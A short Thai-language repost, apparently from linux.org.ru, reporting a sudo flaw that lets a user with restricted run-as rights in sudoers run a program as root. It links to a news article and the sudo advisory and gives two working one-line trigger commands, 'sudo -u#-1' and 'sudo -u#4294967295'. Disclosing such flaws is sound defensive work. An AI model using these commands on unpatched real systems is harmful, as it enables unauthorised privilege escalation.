จุดบกพร่องใน sudo ช่วยให้คุณสามารถเรียกใช้งานไฟล์ปฏิบัติการใด ๆ ในฐานะรูทได้ หาก /etc/sudoers อนุญาตให้ผู้ใช้รายอื่นเรียกใช้ไฟล์นั้นได้ และไม่ได้รับอนุญาตให้ทำการรูท
การใช้ประโยชน์จากข้อผิดพลาดนั้นง่ายมาก:
sudo -u#-1 id -u
หรือ:
sudo -u#4294967295 id -u
ข้อผิดพลาดนี้มีอยู่ใน sudo ทุกเวอร์ชันก่อน 1.8.28
รายละเอียด:
https://thehackernews.com/2019/10/linux-sudo-run-as-root-flaw.html
https://www.sudo.ws/alerts/minus_1_uid.html
ที่มา: linux.org.ru